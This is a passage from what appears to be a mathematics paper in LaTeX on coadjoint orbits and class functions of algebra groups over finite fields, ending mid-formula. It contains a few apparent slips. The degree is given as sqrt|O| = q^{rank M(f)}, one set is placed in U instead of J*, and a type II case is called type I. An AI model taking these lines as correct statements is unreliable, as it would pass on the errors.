The group $G$ acts on $J^{*}$ by $(x \cdot f)(a) = f(x^{-1} a x)$ for
all $x \in G$, all $f \in J^{*}$ and all $a \in J$. (Usually, we refer
to this action as the {\bf coadjoint action} of $G$.) Let $\bfOme(G)$
denote the set of all $G$-orbits on $J^{*}$. We claim that the
cardinality $\ord{\calO}$ of any $G$-orbit $\calO \in \bfOme(G)$ is a
$q^{2}$-power. To see this, let $f \in J^{*}$ be arbitrary and
define $B_{f} \colon J \times J \rightarrow \mathbb{F}_{q}$ by
\eq{Bf}
B_{f}(a,b) = f([ab])
\end{equation}
for all $a,b \in J$ (here $[ab]=ab-ba$ is the usual Lie product of $a,b
\in J$). Then $B_{f}$ is a skew-symmetric $\mathbb{F}_{q}$-bilinear form. Let $n =
\dim J$, let $\bas{e}{n}$ be an $\mathbb{F}_{q}$-basis of $J$ and let $M(f)$ be the
skew-symmetric matrix which represents $B_{f}$ with respect to this basis.
Then $M(f)$ has even rank (see, for example, \cite[Theorem~8.6.1]{cohn}).
Let $$\operatorname{Rad}(f) = \left\{ a \in J \colon f([ab]) = 0 \text{ for all } b \in J \right\}$$ be
the radical of $B_{f}$. Then $\operatorname{Rad}(f)$ is an $\mathbb{F}_{q}$-subspace of $J$ and
\eq{rad}
\dim \operatorname{Rad}(f) = \dim J - \rank M(f).
\end{equation}
We have the following result.
\prop{rad}
Let $f \in J^{*}$ be arbitrary. Then $\operatorname{Rad}(f)$ is a multiplicatively
closed $\mathbb{F}_{q}$-subspace of $J$. Moreover, the centralizer $C_{G}(f)$
of $f$ in $G$ is the algebra subgroup $1+\operatorname{Rad}(f)$ of $G$. In
particular, if $\calO \in \bfOme(G)$ is the $G$-orbit which contains
$f$, then $\ord{\calO} = q^{\rank M(f)}$ is a $q^{2}$-power.
\end{propos}
\begin{proof}
Since $[ab,c] = [a,bc] + [b,ca]$, we clearly have $f([ab,c]) = 0$
for all $a, b \in \operatorname{Rad}(f)$ and all $c \in J$. Thus $\operatorname{Rad}(f)$ is
multiplicatively closed.
On the other hand, let $x \in G$ be arbitrary. Then $x \in C_{G}(f)$
if and only if $f(x^{-1} bx) = f(b)$ for all $b \in J$. Hence $x \in
C_{G}(f)$ if and only if $f(bx) = f(xb)$ for all $b \in J$. Now, let
$a = x-1 \in J$. Then $f(bx) = f(b) + f(ba)$ and $f(xb) = f(b) +
f(ab)$, and so $f([ab]) = f(xb) - f(bx)$ for all $b \in J$. It
follows that $x \in C_{G}(f)$ if and only if $a \in \operatorname{Rad}(f)$.
For the last assertion, we note that $\ord{G} = \ord{C_{G}(f)} \cdot
\ord{\calO}$, that $\ord{G} = q^{\dim J}$ and (as we have just proved)
that $\ord{C_{G}(f)} = q^{\dim \operatorname{Rad}(f)}$. Therefore, by \refe{rad},
we deduce that $\ord{\calO} = q^{\dim J - \dim \operatorname{Rad}(f)} = q^{\rank M(f)}$.
\end{proof}
For each $\calO \in \bfOme(G)$, we define the function $\phi_{\calO} \colon
G \rightarrow \CC$ by the rule
\eq{class}
\phi_{\calO}(1+a) = \frac{1}{\sqrt{\ord{\calO}}} \sum_{f \in \calO}
\psi_{f}(a)
\end{equation}
for all $a \in J$. It is clear that $\phi_{\calO}$ is a class function of
$G$ of degree
\eq{degree}
\phi_{\calO}(1) = \sqrt{\ord{\calO}} = q^{\rank M(f)}
\end{equation}
where $M(f)$ is as before. Moreover, we have the following result.
\prop{ortho}
The set $\left\{ \phi_{\calO} \colon \calO \in \bfOme(G) \right\}$ is an orthonormal
basis for the $\CC$-space $\operatorname{cf}(G)$ consisting of all class functions on
$G$. In particular, we have $$\frac{1}{\ord{G}} \sum_{x \in G}
\phi_{\calO}(x) \overline{\phi_{\calO^{\prime}}(x)} = \del_{\calO, \calO^{\prime}}$$ for all
$\calO, \calO^{\prime} \in \bfOme(G)$. (Here, $\del$ denotes the usual Kronecker
symbol.)
\end{propos}
\begin{proof}
Let $\left\langle \cdot , \cdot \right\rangle_{G}$ denote the Frobenius scalar product
on $\operatorname{cf}(G)$. Let $\calO, \calO^{\prime} \in \bfOme(G)$ be arbitrary. Then
\begin{eqnarray*}
\left\langle \phi_{\calO}, \phi_{\calO^{\prime}} \right\rangle_{G} & = & \frac{1}{\ord{G}}
\sum_{x \in G} \phi_{\calO}(x) \overline{\phi_{\calO^{\prime}}(x)} \\
& = & \frac{1}{\ord{J}}\sum_{a \in J} \frac{1}{\sqrt{\ord{\calO}}}
\frac{1}{\sqrt{\ord{\calO^{\prime}}}} \sum_{f \in \calO} \sum_{f^{\prime} \in \calO^{\prime}}
\psi_{f}(a) \overline{\psi_{f^{\prime}}(a)} \\
& = & \frac{1}{\sqrt{\ord{\calO}}} \frac{1}{\sqrt{\ord{\calO^{\prime}}}}
\sum_{f \in \calO} \sum_{f^{\prime} \in \calO^{\prime}} \left(
\frac{1}{\ord{J}}\sum_{a \in J} \psi_{f}(a) \overline{\psi_{f^{\prime}}(a)}
\right) \\
\end{eqnarray*}
\begin{eqnarray*}
\phantom{\left\langle \phi_{\calO}, \phi_{\calO^{\prime}} \right\rangle_{G}}
& = & \frac{1}{\sqrt{\ord{\calO}}} \frac{1}{\sqrt{\ord{\calO^{\prime}}}}
\sum_{f \in \calO} \sum_{f^{\prime} \in \calO^{\prime}} \left\langle \psi_{f}, \psi_{f^{\prime}}
\right\rangle_{J^{+}} \\
& = & \frac{1}{\sqrt{\ord{\calO}}} \frac{1}{\sqrt{\ord{\calO^{\prime}}}}
\sum_{f \in \calO}
\sum_{f^{\prime} \in \calO^{\prime}} \del_{f,f^{\prime}}
\end{eqnarray*}
(using \refe{irrJ}) and so $$\left\langle \phi_{\calO}, \phi_{\calO^{\prime}} \right\rangle_{G} =
\del_{\calO, \calO^{\prime}}.$$
To conclude the proof, we claim that $\ord{\bfOme(G)}$ equals the class
number $k_{G}$ of $G$; we recall that $k_{G} = \dim_{\CC} \operatorname{cf}(G)$
(see, for example, \cite[Corollary~2.7 and Theorem~2.8]{isaacs2}).
Firstly, we observe that $k_{G}$ is the number of $G$-orbits on $J$ for
the {\it adjoint action}: $x \cdot a = xax^{-1}$ for all $x \in G$ and
all $a \in J$. Let $\tet$ be the permutation character of $G$ on $J$
(see \cite{isaacs2} for the definition). Then, by
\cite[Corollary~5.15]{isaacs2}, $$k_{G} = \left\langle \tet, 1_{G} \right\rangle_{G}.$$
Moreover, by definition, we have $$\tet(x) = \ord{\left\{ a \in J \colon x
\cdot a = a \right\}}$$ for all $x \in G$.
On the other hand, consider the action of $G$ on $\irr(J^{+})$ given by
$$x \cdot \psi_{f} = \psi_{x \cdot f}$$ for all $x \in G$ and all $f \in
J^{*}$. We clearly have $$(x \cdot \psi_{f})(x \cdot a) = \psi_{f}(a)$$
for all $x \in G$, all $f \in J^{*}$ and all $a \in J$. It follows from
Brauer's Theorem (see \cite[Theorem~6.32]{isaacs2}) that $$\tet(x) =
\ord{\left\{ f \in J^{*} \colon x \cdot \psi_{f} = \psi_{f} \right\}}$$ for all
$x \in G$. Therefore, $\tet$ is also the permutation character of $G$
on $\irr(J^{+})$ and so $$\left\langle \tet, 1_{G} \right\rangle_{G} = \ord{\bfOme(G)}.$$
The claim follows and the proof is complete.
\end{proof}
We will prove (see \reft{irred} in \refs{irred}) that $$\irr(G) = \left\{
\phi_{\calO} \colon \calO \in \bfOme(G) \right\}.$$ (This is the key for the proof
of \reft{main}.) Therefore, the next result will of course be a
consequence of that theorem. However, we give below a very easy proof
(independent of \reft{irred}) of the second orthogonality relations for
the functions $\phi_{\calO}$ for $\calO \in \bfOme(G)$.
\prop{ortho2}
Let $x, y \in G$ be arbitrary. Then $$\sum_{\calO \in \bfOme(G)}
\phi_{\calO}(x) \overline{\phi_{\calO}(y)} = \begin{cases} \ord{C_{G}(x)}, &
\text{if $x$ and $y$ are $G$-conjugate,} \\ 0, & \text{otherwise.}
\end{cases}$$
\end{propos}
\begin{proof}
Let $a = x - 1$ and $b = y - 1$. Then
\begin{eqnarray*}
\sum_{\calO \in \bfOme(G)} \phi_{\calO}(x) \overline{\phi_{\calO}(y)} & = &
\sum_{\calO \in \bfOme(G)} \frac{1}{\ord{\calO}} \sum_{f \in \calO} \sum_{g
\in \calO} \psi_{f}(a) \overline{\psi_{g}(b)} \\
& = & \sum_{\calO \in \bfOme(G)} \frac{1}{\ord{\calO}} \sum_{f \in \calO}
\frac{1}{\ord{C_{G}(f)}} \sum_{z \in G} \psi_{f}(a)
\overline{\psi_{f}(z^{-1} b z)} \\
& = & \sum_{\calO \in \bfOme(G)} \sum_{f \in \calO} \frac{1}{\ord{G}}
\sum_{z \in G} \psi_{f}(a - z^{-1} bz) \\
& = & \frac{1}{\ord{G}} \sum_{z \in G} \sum_{f \in J^{*}}
\psi_{f}(a - z^{-1} bz) \\
& = & \frac{1}{\ord{G}} \sum_{z \in G} \rho_{J^{+}}(a - z^{-1} bz)
\end{eqnarray*}
where $\rho_{J^{+}}$ denotes the regular character of $J^{+}$.
It follows that $$\sum_{\calO \in \bfOme(G)} \phi_{\calO}(x)
\overline{\phi_{\calO}(y)} = \sum_{z \in G} \del_{a,z^{-1} bz} = \ord{\left\{ z
\in G \colon a = z^{-1} bz \right\}}$$ and this clearly completes the proof.
\end{proof}
As a consequence we obtain the following additive decomposition of the
regular character $\rho_{G}$ of $G$ (which is also a consequence of
\reft{irred}).
\cor{regular}
$\dsty{\rho_{G} = \sum_{\calO \in \bfOme(G)} \phi_{\calO}(1) \phi_{\calO}}$.
\end{corol}
\begin{proof}
Let $x \in G$ be arbitrary. By the previous proposition,
$$\sum_{\calO \in \bfOme(G)} \phi_{\calO}(1) \phi_{\calO}(x) =
\del_{x,1} \ord{G} = \rho_{G}(x).$$ The result follows (by
definition of $\rho_{G}$).
\end{proof}
\sec{max}{Maximal algebra subgroups}
In this section, we consider restriction and induction of the class
functions defined in the previous section. We follow Kirillov's
theory on nilpotent Lie groups (see, for example,
\cite{corwin-greenleaf}). As before, let $A$ be a finite
dimensional $\mathbb{F}_{q}$-algebra, let $J = J(A)$ and let $G = 1+J$.
Let $U$ be a maximal multiplicatively closed $\mathbb{F}_{q}$-subspace of $J$.
Then $J^{2} \subseteq U$; otherwise, we must have $U + J^{2} = J$ and this
implies that $U = J$ (see \cite[Lemma~3.1]{isaacs1}). It follows that
$U$ is an ideal of $A$ and so $H = 1+U$ is a normal subgroup of $G$ (in
the terminology of \cite{isaacs1}, we say that $H$ is an {\bf ideal
subgroup} of $G$). Moreover, we have $\dim U = \dim J - 1$ and so
$\ord{G:H} = q$.
Let $\pi \colon J^{*} \rightarrow U^{*}$ be the natural projection (by definition,
for any $f \in J^{*}$, $\pi(f) \in U^{*}$ is the restriction of $f$ to $U$).
Then the kernel of $\pi$ is the $\mathbb{F}_{q}$-subspace $$U^{\perp} = \left\{ f \in
J^{*} \colon f(a) = 0 \text{ for all } a \in U \right\}$$ of $U$. On the other hand, for
any $f \in U^{*}$, the fibre $\pi^{-1}(\pi(f))$ of $\pi(f) \in U^{*}$ is
the subset $$\calL(f) = \left\{ g \in U^{*} \colon g(a) = f(a) \text{ for all } a \in U
\right\}$$ of $J^{*}$. It is clear that $$\calL(f) = f + U^{\perp} = \left\{
f+g \colon g \in U^{\perp} \right\}$$ for all $f \in J^{*}$.
Let $f \in J^{*}$ be arbitrary and let $f_{0}$ denote the projection
$\pi(f) \in U^{*}$. Let $\calO \in \bfOme(G)$ be the $G$-orbit which
contains $f$ and let $\calO_{0} \in \bfOme(H)$ be the $H$-orbit which
contains $f_{0}$. Since $\pi(x \cdot f) = x \cdot \pi(f)$ for all $x
\in G$ (because $H$ is normal in $G$, hence $U$ is invariant under the
adjoint $G$-action), the projection $\pi(\calO) \subseteq U^{*}$ of $\calO$
is $G$-invariant. Thus $\calO_{0} \subseteq \pi(\calO)$; in fact, $\pi(\calO)$
is a disjoint union of $H$-orbits. It follows $$\ord{\calO_{0}} \leq
\ord{\pi(\calO)} \leq \ord{\calO}.$$ Let $\pi_{\calO} \colon \calO \rightarrow
\pi(\calO)$ denote the restriction of $\pi$ to $\calO$. Since $\pi_{\calO}$
is surjective, $\calO$ is the disjoint union $$\calO = \bigcup_{g_{0} \in
\pi(\calO)} \pi^{-1}(g_{0}).$$ Since $\pi^{-1}(\pi(g)) = \calL(g) \cap
\calO$ for all $g \in \calO$, we conclude that $$\ord{\calO} =
\sum_{g \in \Gam_{\calO}} \ord{\calL(g) \cap \calO},$$ where $\Gam_{\calO}
\subseteq \calO$ is a set of representatives of the fibres $\pi^{-1}(g_{0})$
for $g_{0} \in \pi(\calO)$. Now, we clearly have $\calL(x \cdot g) =
x \cdot \calL(g)$ for all $x \in G$ and all $g \in J^{*}$. It follows
that
\eq{inters}
x \cdot \left( \calL(g) \cap \calO \right) = \calL(x \cdot g) \cap
\calO
\end{equation}
for all $x \in G$ and all $g \in J^{*}$. In particular, we have
$\ord{\calL(g) \cap \calO} = \ord{\calL(f) \cap \calO}$ for all $g \in \calO$.
Since $\ord{\Gam_{\calO}} = \ord{\calO}$, we conclude that
\eq{order}
\ord{\calO} = \ord{\pi(\calO)} \cdot \ord{\calL(f) \cap \calO}.
\end{equation}
In particular, we deduce that $$\ord{\calO} \leq q \ord{\pi(\calO)}$$
(because $\calL(f) = f + U^{\perp}$, hence $\ord{\calL(f)} = q$). We
claim that $\ord{\pi(\calO)}$ is a power of $q$. In fact, we have the
following.
\lem{rad}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $f \in J^{*}$ be arbitrary and let $\calO \in \bfOme(G)$
be the $G$-orbit which contains $f$. Then:
\begin{enumerate}
\al{a} The centralizer $C_{G}(f_{0})$ of $f_{0} = \pi(f)$ in $G$ is
an algebra subgroup of $G$; in fact, $C_{G}(f_{0}) = 1 + R$ where $R =
\left\{ a \in J \colon f([ab]) = 0 \text{ for all } b \in U \right\}$.
\al{b} $\ord{\pi(\calO)}$ is a power of $q$; in fact, either
$\ord{\calO} = \ord{\pi(\calO)}$, or $\ord{\calO} = q \ord{\pi(\calO)}$.
\end{enumerate}
\end{lemma}
\begin{proof}
The proof of (a) is analoguous to the proof of \refp{rad}. On the
other hand, since $G$ acts transitively on $\pi(\calO)$, we have
$$\ord{\pi(\calO)} = \ord{G} \cdot \ord{C_{G}(f_{0})}^{-1} = q^{\dim J -
\dim R}.$$ The last assertion is clear because $\ord{\pi(\calO)}
\leq \ord{\calO} \leq q \ord{\pi(\calO)}$.
\end{proof}
Following \cite{kirillov2}, we say a $G$-orbit $\calO \in \bfOme(G)$ is of
{\bf type I} (with respect to $H$) if $\ord{\calO} = \ord{\pi(\calO)}$;
otherwise, if $\ord{\calO} = q \ord{\pi(\calO)}$, we say that $\calO$ is of
{\bf type II} (with respect to $H$). The following result asserts that
our definition is, in fact, equivalent to Kirillov's definition.
\prop{types}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural projection.
Let $\calO \in \bfOme(G)$ be arbitrary. Then:
\begin{enumerate}
\al{a} $\calO$ is of type I (with respect to $H$) if and only
if $\calL(f) \cap \calO = \left\{ f \right\}$ for all $f \in \calO$;
\al{b} $\calO$ is of type II (with respect to $H$) if and only
if $\calL(f) \subseteq \calO$ for all $f \in \calO$.
\end{enumerate}
\end{propos}
\begin{proof}
Suppose that $\ord{\calO} = \ord{\pi(\calO)}$ (i.e., $\calO$ is of type I).
Then \refe{order} implies that $\ord{\calL(f) \cap \calO} = 1$
and so $\calL(f) \cap \calO = \left\{ f \right\}$. On the other hand,
if $\ord{\calO} = q \ord{\pi(\calO)}$ (i.e., if $\calO$ is of type II), we
must have $\ord{\calL(f) \cap \calO} = q$ and so $\calL(f) \subseteq \calO$
(because $\ord{\calL(f)} = q$). The result follows by
\refe{inters}.
\end{proof}
Now, let $n = \dim J$ and let $\bas{e}{n}$ be an $\mathbb{F}_{q}$-basis of $J$ such
that $e_{i} \in U$ for all $1 \leq i \leq n-1$. Moreover, let $M =
M(f)$ be the $n \times n$ skew-symmetric matrix which represents the bilinear
form $B_{f}$ with respect to the basis $\bas{e}{n}$. By \refp{rad},
$\ord{\calO} = q^{\rank M}$. Moreover, the matrix $M$ has the form $$M =
\begin{bmatrix} M_{0} & - \nu^{T} \\ \nu & 0 \end{bmatrix}$$ where $M_{0} = M(f_{0})$ is the
$(n-1) \times (n-1)$ skew-symmetric matrix which represents the bilinear form
$B_{f_{0}} \colon U \times U \rightarrow \mathbb{F}_{q}$ with respect to the $\mathbb{F}_{q}$-basis
$\bas{e}{n-1}$ of $U$, and $\nu$ is the row vector $\nu = \left[
f([e_{n}\, e_{1}])\ \cdots\ f([e_{n}\, e_{n-1}]) \right]$. Since
$\calO_{0}$ is the $H$-orbit of the element $f_{0} \in U^{*}$, we
have $\ord{\calO_{0}} = q^{\rank M_{0}}$ (by \refp{rad}). Since $M$ and
$M_0$ are skew-symmetric matrices, they have even ranks and so, either
$\rank M = \rank M_{0}$, or $\rank M = \rank M_{0} + 2$. This concludes
the proof of the following.
\lem{order}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO \in \bfOme(G)$ be arbitrary and let $\calO_{0}
\in \bfOme(H)$ be such that $\calO_{0} \subseteq \pi(\calO)$. Then, either
$\ord{\calO} = \ord{\calO_{0}}$, or $\ord{\calO} = q^{2} \ord{\calO_{0}}$.
\end{lemma}
We note that, since $\ord{\calO_{0}} \leq \ord{\pi(\calO)} \leq \ord{\calO}$,
the equality $\ord{\calO} = \ord{\calO_{0}}$ implies that $\calO$ is of type
I (with respect to $H$); hence, $\ord{\calO} = q^{2} \ord{\calO_{0}}$
whenever $\calO$ is of type II (with respect to $H$). Our next result shows
that the dicothomy of the preceeding lemma characterizes the $G$-orbit
$\calO$ with respect to the subgroup $H$.
\prop{char}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO \in \bfOme(G)$ be arbitrary and let $\calO_{0}
\in \bfOme(H)$ be such that $\calO_{0} \subseteq \pi(\calO)$. Moreover, let $f
\in \calO$ be such that the projection $f_{0} = \pi(f)$ lies in
$\calO_{0}$. Then:
\begin{enumerate}
\al{a} The following are equivalent:
\begin{enumerate}
\al{i} $\ord{\calO}$ is of type I (with respect to $H$);
\al{ii} $\ord{\calO} = \ord{\calO_{0}}$;
\al{iii} $\dim \operatorname{Rad}(f) = \dim \operatorname{Rad}(f_{0}) + 1$;
\al{iv} $\ord{C_{G}(f)} = q \ord{C_{H}(f_{0})}$.
\end{enumerate}
\al{b} The following are equivalent:
\begin{enumerate}
\al{i} $\ord{\calO}$ is of type II (with respect to $H$);
\al{ii} $\ord{\calO} = q^{2} \ord{\calO_{0}}$;
\al{iii} $\dim \operatorname{Rad}(f) = \dim \operatorname{Rad}(f_{0}) - 1$;
\al{iv} $\ord{C_{G}(f)} = q^{-1} \ord{C_{H}(f_{0})}$.
\end{enumerate}
\end{enumerate}
\end{propos}
\begin{proof}
The equivalence $\impd{iii}{iv}$ (in both (a) and (b)) follows from
\refp{rad}. On the other hand, the equivalence $\impd{ii}{iii}$ (in
both (a) and (b)) follows from \refe{rad} (using also \refp{rad}).
We have already proved that $\imp{ii}{i}$ in (a) (which is equivalent
to $\imp{i}{ii}$ in (b)). Conversely, suppose that $\ord{\calO}$ is of
the type I (with respect to $H$). Then $\ord{\pi(\calO)} = \ord{\calO}$.
Since $G$ acts transitively on $\pi(\calO)$, we deduce that $$\ord{G} =
\ord{C_{G}(f_{0})} \cdot \ord{\pi(\calO)} = \ord{C_{G}(f_{0})} \cdot
\ord{\calO}.$$ It follows that $\ord{C_{G}(f_{0})} = \ord{C_{G}(f)}$.
Since $C_{G}(f) \subseteq C_{G}(f_{0})$, we conclude that $C_{G}(f_{0}) =
C_{G}(f)$. On the other hand, $C_{H}(f_{0}) \subseteq C_{G}(f_{0})$ and so
$C_{H}(f_{0}) \subseteq C_{G}(f)$. By the equivalence $\impd{ii}{iv}$ (in
both (a) and (b)), we conclude that $\ord{\calO} = \ord{\calO_{0}}$.
This completes the proof of $\imp{i}{ii}$ in (a). Hence, the
implication $\imp{ii}{i}$ in (b) is also true. The proof is complete.
\end{proof}
We note that, since $\calO_{0} \subseteq \pi(\calO)$, the equality $\ord{\calO} =
\ord{\calO_{0}}$ implies that $\pi(\calO) = \calO_{0}$ (hence, the
projection $\pi(\calO)$ of the $G$-orbit $\calO$ is an $H$-orbit). This
concludes the proof of part (a) of the following result.
\prop{dec}
Let $H$ be a maximal algebra subgroup of $G$, let $U \subseteq J$ be such
that $H = 1+U$ and let $\apl{\pi}{J^{*}}{U^{*}}$ be the natural
projection. Let $\calO \in \bfOme(G)$ be arbitrary and let $\calO_{0}
\in \bfOme(H)$ be such that $\calO_{0} \subseteq \pi(\calO)$. Moreover, let
$f \in \calO$ be such that the projection $f_{0} = \pi(f)$ lies in
$\calO_{0}$. Then the following statements hold:
\begin{enumerate}
\al{a} If $\calO$ is of type I (with respect to $H$), then
$\pi(\calO) = \calO_{0}$ is a single $H$-orbit on $U^{*}$.
\al{b} Suppose that $\calO$ is of type II (with respect to $H$). Let
$e \in J$ be such that $J = U \+ \mathbb{F}_{q} e$ and, for each $\alp \in
\mathbb{F}_{q}$, let $x_{\alp}$ denote the element $1 + \alp e \in G$. Then
$\pi(\calO)$ is the disjoint union $$\pi({\calO}) = \bigcup_{\alp \in
\mathbb{F}_{q}} \calO_{\alp}$$ where, for each $\alp \in \mathbb{F}_{q}$, $\calO_{\alp} \subseteq
U^{*}$ is the $H$-orbit which contains the element $x_{\alp} \cdot
f_{0} \in U^{*}$. We have $$\calO_{\alp} = x_{\alp} \cdot \calO_{0} =
\left\{ x_{\alp} \cdot g \colon g \in \calO_{0} \right\}$$ for all $\alp \in
\mathbb{F}_{q}$. Moreover, the set $\left\{ x_{\alp} \colon \alp \in \mathbb{F}_{q} \right\}$
can be replaced by any set of representatives of the of cosets of
$H$ in $G$.
\end{enumerate}
\end{propos}
\begin{proof}
It remains to prove part (b).
Let $\alp \in \mathbb{F}_{q}$ be arbitrary. Since $\pi$ is $G$-invariant, we have
$x_{\alp} \cdot \pi(f) = \pi(x_{\alp} \cdot f)$ and so $x_{\alp} \cdot
f_{0} \in \pi(\calO)$ (we recall that $f_{0} = \pi(f)$). It follows
that $\calO_{\alp} \subseteq \pi(\calO)$.
Next, we prove that $\calO_{\alp} = x_{\alp} \cdot \calO_{0}$. To see this,
let $x \in H$ be arbitrary. Then $x \cdot (x_{\alp} \cdot f_{0}) = (x
x_{\alp}) \cdot f_{0} = (x_{\alp} x_{\alp}^{-1} x x_{\alp}) \cdot f_{0} =
x_{\alp} \cdot \left( (x_{\alp}^{-1} x x_{\alp}) \cdot f_{0} \right)$. Since
$H$ is normal in $G$, we have $x_{\alp}^{-1} x x_{\alp} \in H$ and so
$(x_{\alp}^{-1} x x_{\alp}) \cdot f_{0} \in \calO_{0}$. Since $x \in H$
is arbitrary, we conclude that
\eq{inc}
\calO_{\alp} \subseteq x_{\alp} \cdot \calO_{0}.
\end{equation}
It follows that $\ord{\calO_{\alp}} \leq \ord{\calO_{0}} = q^{-2}
\ord{\calO}$ (by \refp{char}) and so $\ord{\calO_{\alp}} < \ord{\calO}$.
By \refl{order}, we conclude that $\ord{\calO_{\alp}} = q^{-2} \ord{\calO}$
and so $\ord{\calO_{\alp}} = \ord{\calO_{0}} = \ord{x_{\alp} \cdot
\calO_{0}}$. By \refe{inc}, we obtain $\calO_{\alp} = x_{\alp} \cdot
\calO_{0}$ as required.
Now, suppose that $\bet \in \mathbb{F}_{q}$ is such that $x_{\bet} \cdot f_{0} \in
\calO_{\alp}$. Then, there exists $x \in H$ such that $x_{\bet} \cdot
f_{0} = x \cdot (x_{\alp} \cdot f_{0}) = (x x_{\alp}) \cdot f_{0}$. It
follows that $x_{\bet}^{-1} x x_{\alp} \in C_{H}(f_{0})$. In particular,
$x_{\bet}^{-1} x x_{\bet} x_{\bet}^{-1} x_{\alp} \in H$ and so
$x_{\bet}^{-1} x_{\alp} \in H$ (because $H$ is normal in $G$ and $x
\in H$). Since $x_{\bet}^{-1} = 1 - \bet e + a$ for some $a \in
J^{2}$, we have $$x_{\bet}^{-1} x_{\alp} = 1 + (\alp - \bet) e -
(\alp \bet) e^{2} + \alp ea.$$ Since $J^{2} \subseteq U$, we conclude that
$(\alp - \bet) e \in U$ and this implies that $\alp = \bet$. It follows
that the $H$-orbits $\calO_{\alp} \subseteq \pi(\calO)$, for $\alp \in \mathbb{F}_{q}$,
are all distinct. Hence, the union $\bigcup_{\alp \in \mathbb{F}_{q}} \calO_{\alp}$
is disjoint and so $$\ord{\bigcup_{\alp \in \mathbb{F}_{q}} \calO_{\alp}} = \sum_{\alp
\in \mathbb{F}_{q}} \ord{\calO_{\alp}} = q \cdot \ord{\calO_{0}} = q^{-1} \cdot
\ord{\calO} = \ord{\pi(\calO)}$$ (because $\calO$ is of type I, hence
$\ord{\calO} = q \ord{\pi(\calO)} = q^{2} \ord{\calO_{0}}$). Since
$\calO_{\alp} \subseteq \calO$ for all $\alp \in \mathbb{F}_{q}$, we conclude that
$$\pi(\calO) = \bigcup_{\alp \in \mathbb{F}_{q}} \calO_{\alp}$$ as required.
Finally, let $\Gam \subseteq G$ be a set of representatives of the cosets
of $H$ in $G$. Then $G$ is the disjont union $$G = \bigcup_{x \in \Gam}
xH.$$ Since $\ord{G:H} = q$, we have $\ord{\Gam} = q$. Moreover,
for each $x \in \Gam$, there exists a unique $\alp \in \mathbb{F}_{q}$ such
that $x \in x_{\alp} H$. It follows that $x \cdot \calO_{0} \subseteq
x_{\alp} \cdot \calO_{0}$ and, by order considerations, the equality must
occur.
The proof is complete.
\end{proof}
Next, given an arbitrary $G$-orbit $\calO \in \bfOme(G)$, we consider the
restriction $(\phi_{\calO})_{H}$ of the class function $\phi_{\calO}$ to
to the maximal algebra subgroup $H$. For simplicity, we shall write
$\phi = \phi_{\calO}$. We recall that, by definition (see \refe{class}),
we have $$\phi(1+a) = \frac{1}{\sqrt{\ord{\calO}}} \sum_{f \in \calO}
\psi_{f}(a)$$ for all $a \in J$.
Suppose that $\calO$ is of type I. Then, by \refp{dec}, we have
$\pi(\calO) = \calO_{0}$. Let $a \in U$ be arbitrary and consider
the class function $\phi_{\calO_{0}} \in \operatorname{cf}(H)$; for simplicity, we
shall write $\phi_{0} = \phi_{\calO_{0}}$. We have $$\phi_{0}(1+a) =
\frac{1}{\sqrt{\ord{\calO_{0}}}} \sum_{g \in \calO_{0}} \psi_{g}(a) =
\frac{1}{\sqrt{\ord{\calO_{0}}}} \sum_{g \in \pi(\calO)} \psi_{g}(a).$$
On the other hand, since $\calL(f) \cap \calO = \left\{ f \right\}$ for all
$f \in \calO$ (by \refp{types}), the map $\pi$ determines naturally a
bijection between the $G$-orbit $\calO \subseteq J^{*}$ and the $H$-orbit
$\calO_{0} = \pi(\calO) \subseteq U^{*}$. Therefore $$\sum_{g \in \pi(\calO)}
\psi_{g}(a) = \sum_{f \in \calO} \psi_{f}(a).$$ Since $\ord{\calO} =
\ord{\calO_{0}}$ (by \refp{char}), we conclude that $$\phi(a) =
\phi_{0}(a)$$ for all $a \in U$. It follows that $$\phi_{H} =
\phi_{0}.$$
Now, suppose that $\calO$ is of type II. Then, by \refp{dec},
$\pi(\calO)$ is the disjoint union $$\pi(\calO) = \bigcup_{\alp \in \mathbb{F}_{q}}
\calO_{\alp}$$ of $H$-orbits $\calO_{\alp}$ for $\alp \in \mathbb{F}_{q}$. Let $a
\in U$ be arbitrary. In this case, we have $$\sum_{g \in \pi(\calO)}
\psi_{g}(a) = \sum_{\alp \in \mathbb{F}_{q}} \sum_{g \in \calO_{\alp}}
\psi_{g}(a) = \sum_{\alp \in \mathbb{F}_{q}} \sqrt{\ord{\calO_{\alp}}} \cdot
\phi_{\alp}(1+a)$$ where, for any $\alp \in \mathbb{F}_{q}$, $\phi_{\alp}$
denotes the class function $\phi_{\calO_{\alp}} \in \operatorname{cf}(H)$. Since
$\ord{\calO_{\alp}} = q^{-2} \ord{\calO}$ for all $\alp \in \mathbb{F}_{q}$ (see
the proof of \refp{dec}), we conclude that $$\sum_{\alp \in \mathbb{F}_{q}}
\phi_{\alp}(1+a) = \frac{q}{\sqrt{\ord{\calO}}} \sum_{g \in \pi(\calO)}
\psi_{g}(a).$$ On the other hand, we have $\calL(f) \subseteq \calO$ for all
$f \in \calO$ (by \refp{types}). Hence, there exist elements $\seq{f}{r}
\in \calO$ such that $\calO$ is the disjoint union $$\calO = \calL(f_{1})
\cup \ldots \cup \calL(f_{r}).$$ It follows that $$\phi(1+a) =
\frac{1}{\sqrt{\ord{\calO}}} \sum_{f \in \calO} \psi_{f}(a) =
\frac{1}{\sqrt{\ord{\calO}}} \sum_{i=1}^{r} \sum_{f \in \calL(f_{i})}
\psi_{f}(a) = \frac{q}{\sqrt{\ord{\calO}}} \sum_{i=1}^{r}
\psi_{f_{i}}(a)$$ (because $f(a) = f_{i}(a)$ for all $f \in
\calL(f_{i})$). Finally, we clearly have $r = \ord{\pi(\calO)}$ and
$\pi(\calO) = \left\{ \pi(f_{1}), \ldots, \pi(f_{r}) \right\}$. Therefore,
$$\sum_{i=1}^{r} \psi_{f_{i}}(a) = \sum_{g \in \pi(\calO)}
\psi_{g}(a).$$ It follows that $$\phi_{H} = \sum_{\alp \in \mathbb{F}_{q}}
